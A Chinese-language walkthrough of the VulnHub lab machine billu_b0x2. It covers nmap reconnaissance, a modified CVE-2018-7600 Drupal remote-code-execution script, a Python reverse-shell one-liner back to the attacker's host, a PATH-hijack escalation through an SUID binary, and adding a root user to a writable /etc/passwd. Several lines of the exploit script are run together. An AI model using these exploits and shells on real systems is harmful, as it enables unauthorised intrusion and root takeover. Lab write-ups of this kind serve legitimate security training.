vulnhub靶场【billu系列】之billu

vulnhub靶场【billu系列】之billu_b0x2靶机

前言

靶机：billu_b0x2靶机，IP地址为192.168.10.10

攻击：kali，IP地址为192.168.10.6

靶机和攻击机都采用VMware虚拟机，都采用桥接网卡模式

文章涉及的靶机及工具，都可以自行访问官网或者项目地址进行获取，或者通过网盘链接下载 https://pan.quark.cn/s/c524477461b0

主机发现

也就是相当于现实环境中去发现确定主机的ip地址，因为这里是靶机环境，所以跳过了从域名到ip地址的过程。

使用arp-scan -l或者netdiscovery -r 192.168.10.1/24

当然也可以使用nmap等工具进行

arp-scan -l

信息收集

使用nmap扫描目标端口等信息

首先扫描目标的tcp端口的开放情况

nmap -sT --min-rate=1000 192.168.10.10 -p- -oA nmap-tcp

再扫描udp端口的开放情况

nmap -sU --min-rate=1000 192.168.10.10 --top-ports 20 -oA nmap-udp

可以看到明确开放的udp端口没有，所以下面对tcp端口进行一个筛选

ports=`grep open nmap-tcp.nmap | awk -F'/' '{print $1}' | paste -sd ','`

进一步对这些端口进行服务、系统等探测

nmap -sV -O -sC 192.168.10.10 -p $ports --min-rate=1000 -oA detail

再使用nmap的漏洞检测脚本对这些端口进行探测

nmap --script=vuln 192.168.10.10 -p $ports -oA vuln

网站信息探测

访问80端口界面，可以看到有搜索框，以及登录的

向下可以看到涉及到一个cms，为``drupal`，缅怀艾斯【火拳】

使用whatweb或者浏览器插件wappalyzer识别配置

whatweb http://192.168.10.10 -v

使用gobuster等工具进行爆破，发现就那么几个

gobuster dir -u http://192.168.10.10 -w /usr/share/wordlists/dirb/big.txt -b 404,403 -x php,html,txt,md

把这些目录都访问，没发现什么关键信息，并且访问robots.txt文件，虽然有很多目录，但是访问后，并没效果

在访问到登录的界面时，发现有一个默认的用户名biLLu和密码hEx_it

以上面的用户名和密码尝试访问8080端口的界面，并尝试登录，发现并不行

没有了，信息结合一下。

网站采用drupal 8版本

目前，只有字典继续爆破，采用大字典，或者搜索有无历史漏洞

漏洞寻找及确定

使用searchsploit尝试搜索

searchsploit drupal 8.0

发现大部分都是msf的脚本，不过还是有三个不一样的，这里一个个测试，先测试44448.py

查看这个代码，发现关键信息，这个脚本是检测目标是否有cve-2018-7600漏洞的

下面发现关键代码，若存在会输出一个文件

执行脚本进行检测靶机，发现输出检测了，访问这个文件，确定有漏洞

漏洞利用

既然如此，可以修改这个脚本去执行一些命令。ok，现在修改payload，在原基础上，只改动了一点，接收命令

#!/usr/bin/env
import sys
import requests
import jsonprint ('################################################################')
print ('# Proof-Of-Concept for CVE-2018-7600')
print ('# by Vitalii Rudnykh')
print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print ('# https://github.com/a2u/CVE-2018-7600')
print ('################################################################')
print ('Provided only for educational or information purposes\n')target = input('Enter target url (example: https://domain.ltd/): ')
command = input('Enter command (example: id):') proxies = {}
verify = Trueurl = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': command}r = requests.post(url, proxies=proxies, data=payload, verify=verify)
res = r.textjson_text=json.dumps(res,indent=4)
print(json_text)

那么构造一个反弹shell的命令，执行即可，测试多个命令，最终以python的反弹shell成功

export RHOST="192.168.10.6";export RPORT=443;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'

可以看到成功获取到shell了，当然前面需要进行nc监听就没说

提权

再使用python加一层shell

python -c 'import pty;pty.spawn("/bin/bash")'

使用find寻找具有SUID权限的文件，发现一个陌生的明显的文件

find / -perm -4000 -print 2>/dev/null

使用file查看，发现是二进制可执行文件，并且该文件具有执行的权限

测试，发现靶机具有strings工具，那么直接查看这个文件，发现一些东西

这里可以自己执行文件测试一下，发现最后是有字符starting copy of root user files出现的。说明后面的命令会执行，也就是scp，并且注意，这里没有搞绝对路径，所以可以借助环境变量提权

cd /tmp
echo $PATH

那么修改环境变量

export PATH=/tmp:$PATH
echo $PATHecho "/bin/bash" > scp
chmod +x scp

然后执行脚本即可/opt/s

查看/etc/passwd的权限，发现该文件具有写权限的，那么就可以添加一个具有root权限的用户，需要构造

使用openssl生成密码

openssl passwd -salt 123 -1 123

#把x改为加密后的密码，root改为随便的用户名 
root:x:0:0:root:/root:/bin/bashpig:$1$123$nE5gIYTYiF1PIXVOFjQaW/:0:0:test:/root:/bin/bashecho 'pig:$1$123$nE5gIYTYiF1PIXVOFjQaW/:0:0:test:/root:/bin/bash' >> /etc/passwd

这时候直接切换就ok了